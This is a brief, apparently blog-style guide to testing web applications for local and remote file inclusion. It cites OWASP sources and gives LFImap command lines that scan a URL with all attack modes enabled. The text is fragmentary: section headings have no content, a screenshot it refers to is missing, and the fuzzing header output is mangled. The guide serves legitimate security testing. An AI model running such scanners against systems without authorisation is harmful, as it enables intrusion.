Application Security Testing for the File Inclusion vulnerabilities.
The article describes how to test the application to find Local & Remote File Inclusion vulnerabilities. The advice in this article is based on:
- OWASP Web Security Testing Guide
- OWASP Application Security Verification Standard
- Bug bounty reports
- Own experience.
Tools with basic usage & wordlist used for LFI and RFI detection.
- LFImap — LFI & RFI discovery and exploitation tool.
In the current development stage, I suggest using ffuf instead with the custom wordlists for RFI & LFI detection. However, this project is in pre-alpha. The developer states that release 1.0 is coming soon. It is worth keeping an eye on it.
# SINGLE URL (PWN - injection place)
python lfimap.py -U "https://afine.com/converter?filename=PWN" -a
# MULTIPLE URLS (each URL must have PWN specified)
python lfimap.py -F urls.txt -a
I have described how to use above automatic scanners in another article:
Infrastructure testing with MSF
Penetration testing of the corporate network using Metasploit
BURP SUITE PRO EXTENSIONS
# EXAMPLE OUTPUT FROM THE ABOVE SCREENSHOT:
-X "GET" -H "/test/FUZZHTTP/1.1" -H "Host:afine.com" -H "User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/115.0.5790.110Safari/537.36" -H "Accept-Encoding:gzip,deflate" -H "Connection:close"